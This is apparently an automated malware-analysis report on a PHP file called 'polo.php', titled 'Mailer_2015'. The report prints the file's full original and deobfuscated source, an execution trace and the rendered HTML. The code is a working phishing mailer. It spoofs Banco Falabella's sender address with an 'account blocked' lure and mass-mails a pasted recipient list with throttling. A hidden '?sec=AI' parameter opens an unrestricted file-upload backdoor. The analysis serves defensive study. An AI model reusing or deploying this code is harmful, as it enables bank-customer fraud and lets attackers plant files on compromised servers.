PHP Malware Analysis
polo.php
md5: 821017288cfa63d9e5fdcededc3d19de
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- bf@bancofalabella.com.pe (Deobfuscated, HTML, Original, Traces)
- carlosrkr@live.com (Deobfuscated, HTML, Original)
- motorolarkr@gmail.com (Deobfuscated, Original, Traces)
Environment
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- Mailer_2015 (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
$auth_pass = "";
function wsoLogin()
{
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
wsoLogin();
}
}
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
@set_time_limit(0);
if (isset($_POST['Enoc'])) {
$message = $_POST['html'];
$subject = $_POST['assunto'];
$de = $_POST['de'];
$nombre = $_POST['RealName'];
$ellos = $_POST['ellos'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
} else {
$testa = "";
$message = "Te informamos que tu cuenta a sido bloqueada.";
$subject = $_SERVER["HTTP_HOST"];
$nombre = "=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella";
$de = "bf@bancofalabella.com.pe";
$ellos = "motorolarkr@gmail.com";
}
?>
<html>
<head>
<title>Mailer_2015</title></head>
</head>
<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
<tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tr>
<td>
<table border="0" width="100%">
<tr>
<td width="359">Email: <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre: <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">
carlosrkr@live.com</textarea></td>
</tr>
</table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
<?php
if ($_GET['sec'] == 'AI') {
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">\r\n <input name=\"archivo\" type=\"file\" size=\"35\" />\r\n <input name=\"action\" type=\"hidden\" value=\"upload\" /> \r\n\t</form>";
$status = "";
if ($_POST["action"] == "") {
$tamano = $_FILES["archivo"]['size'];
$tipo = $_FILES["archivo"]['type'];
$archivo = $_FILES["archivo"]['name'];
if ($archivo != "") {
if (copy($_FILES['archivo']['tmp_name'], "./" . $archivo)) {
$status = "Archivo subido: <b>" . $archivo . "</b>";
} else {
$status = "Error al subir el archivo";
}
} else {
$status = "Error al subir archivo";
}
echo $status;
}
}
if (!isset($_POST['Enoc'])) {
exit;
}
if (!isset($_GET['c'])) {
$email = explode("\n", $ellos);
} else {
$email = explode(",", $ellos);
}
$son = count($email);
if (!isset($_GET['e'])) {
$header = "MIME-Version: 1.0\n";
$header = "MIME-Version: 1.0\nContent-type: text/html; charset=iso-8859-1\n";
$header .= "From: " . $nombre . " <" . $de . ">\n";
$header .= "Reply-To: " . $de . "\n";
$header .= "X-Priority: 3\n";
$header .= "X-MSMail-Priority: Normal\n";
$header .= "X-Mailer: " . $_SERVER["HTTP_HOST"];
} else {
$header = "MIME-Version: 1.0\r\n";
$header = "MIME-Version: 1.0\r\nContent-type: text/html\r\n";
$header .= "From: " . $de;
}
$i = 0;
$voy = 1;
while ($email[$i]) {
if (isset($_GET['time']) && isset($_GET['cant'])) {
if (fmod($i, $_GET['cant']) == 0 && $i > 0) {
print "----------------------------------> wait " . $_GET['time'] . " Segs. Sending to " . $_GET['notf'] . "...<br>\n";
flush();
@mail($_GET['notf'], $subject, $message, $header);
sleep($_GET['time']);
}
}
$mail = str_replace(array("\n", "\r\n"), '', $email[$i]);
$message1 = ereg_replace("%email%", $mail, $message);
if (@mail($mail, $subject, $message1, $header)) {
print "<font color=blue face=verdana size=1> " . $voy . " de " . $son . " ;-) " . trim($mail) . " okey dokey!</font><br>\n";
flush();
} else {
print "<font color=red face=verdana size=1> " . $voy . " de " . $son . ":-( " . trim($mail) . " Error te digo altoquesein!!</font><br>\n";
flush();
}
$i++;
$voy++;
}
echo "<script> alert('---Todos Spameados---'); </script>";
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</form>
</center>
</html>Execution traces
data/traces/821017288cfa63d9e5fdcededc3d19de_trace-1676254964.5419.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:23:10.439775]
1 0 1 0.000270 393512
1 3 0 0.000578 422320 {main} 1 /var/www/html/uploads/polo.php 0 0
1 A /var/www/html/uploads/polo.php 3 $auth_pass = ''
2 4 0 0.000627 422320 set_time_limit 0 /var/www/html/uploads/polo.php 18 1 0
2 4 1 0.000652 422384
2 4 R FALSE
1 A /var/www/html/uploads/polo.php 33 $testa = ''
1 A /var/www/html/uploads/polo.php 34 $message = 'Te informamos que tu cuenta a sido bloqueada.'
1 A /var/www/html/uploads/polo.php 35 $subject = 'localhost'
1 A /var/www/html/uploads/polo.php 36 $nombre = '=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella'
1 A /var/www/html/uploads/polo.php 37 $de = 'bf@bancofalabella.com.pe'
1 A /var/www/html/uploads/polo.php 38 $ellos = 'motorolarkr@gmail.com'
0.000832 343176
TRACE END [2023-02-13 00:23:10.440384]
Generated HTML code
<html><head>
<title>Mailer_2015</title></head>
<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
<tbody><tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tbody><tr>
<td>
<table border="0" width="100%">
<tbody><tr>
<td width="359">Email: <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre: <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tbody><tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">carlosrkr@live.com</textarea></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
</td></tr></tbody></table></td></tr></tbody></table></form></center></body></html>Original PHP code
<?php
$auth_pass = "";
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
@set_time_limit(0);
if(isset($_POST['Enoc']))
{
$message = $_POST['html'];
$subject = $_POST['assunto'];
$de = $_POST['de'];
$nombre = $_POST['RealName'];
$ellos = $_POST['ellos'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
}else{
$testa ="";
$message = "Te informamos que tu cuenta a sido bloqueada.";
$subject = $_SERVER["HTTP_HOST"];
$nombre = "=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella";
$de = "bf@bancofalabella.com.pe";
$ellos = "motorolarkr@gmail.com";
}
?>
<html>
<head>
<title>Mailer_2015</title></head>
</head>
<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
<tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tr>
<td>
<table border="0" width="100%">
<tr>
<td width="359">Email: <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre: <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">
carlosrkr@live.com</textarea></td>
</tr>
</table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
<?php
if($_GET['sec']=='AI')
{
echo '<form action="" method="post" enctype="multipart/form-data">
<input name="archivo" type="file" size="35" />
<input name="action" type="hidden" value="upload" />
</form>';
$status = "";
if ($_POST["action"] == "")
{
$tamano = $_FILES["archivo"]['size'];
$tipo = $_FILES["archivo"]['type'];
$archivo = $_FILES["archivo"]['name'];
if ($archivo != "")
{
if (copy($_FILES['archivo']['tmp_name'],"./".$archivo))
{
$status = "Archivo subido: <b>".$archivo."</b>";
}else{
$status = "Error al subir el archivo";
}
} else {
$status = "Error al subir archivo";
}
echo $status;
}
}
if(!isset($_POST['Enoc'])){
exit;
}
if(!isset($_GET['c']))
{
$email = explode("\n", $ellos);
}else{
$email = explode(",", $ellos);
}
$son = count($email);
if(!isset($_GET['e'])){
$header = "MIME-Version: 1.0\n";
$header .= "Content-type: text/html; charset=iso-8859-1\n";
$header .= "From: ".$nombre . " <" . $de . ">\n";
$header .= "Reply-To: " . $de . "\n";
$header .= "X-Priority: 3\n";
$header .= "X-MSMail-Priority: Normal\n";
$header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
}else{
$header ='MIME-Version: 1.0' . "\r\n";
$header .= 'Content-type: text/html' . "\r\n";
$header .="From: ".$de;
}
$i = 0;
$voy=1;
while($email[$i])
{
if(isset($_GET['time']) && isset($_GET['cant'])){
if(fmod($i,$_GET['cant'])==0 && $i>0){
print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
flush();
@mail($_GET['notf'], $subject, $message, $header);
sleep($_GET['time']);
}
}
$mail = str_replace(array("\n","\r\n"),'',$email[$i]);
$message1 = ereg_replace("%email%", $mail, $message);
if(@mail($mail, $subject, $message1, $header))
{
print "<font color=blue face=verdana size=1> ".$voy." de ".$son." ;-) ".trim($mail)." okey dokey!</font><br>\n";
flush();
}
else
{
print "<font color=red face=verdana size=1> ".$voy." de ".$son.":-( ".trim($mail)." Error te digo altoquesein!!</font><br>\n";
flush();
}
$i++;
$voy++;
}
echo "<script> alert('---Todos Spameados---'); </script>";
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</form>
</center>
</html>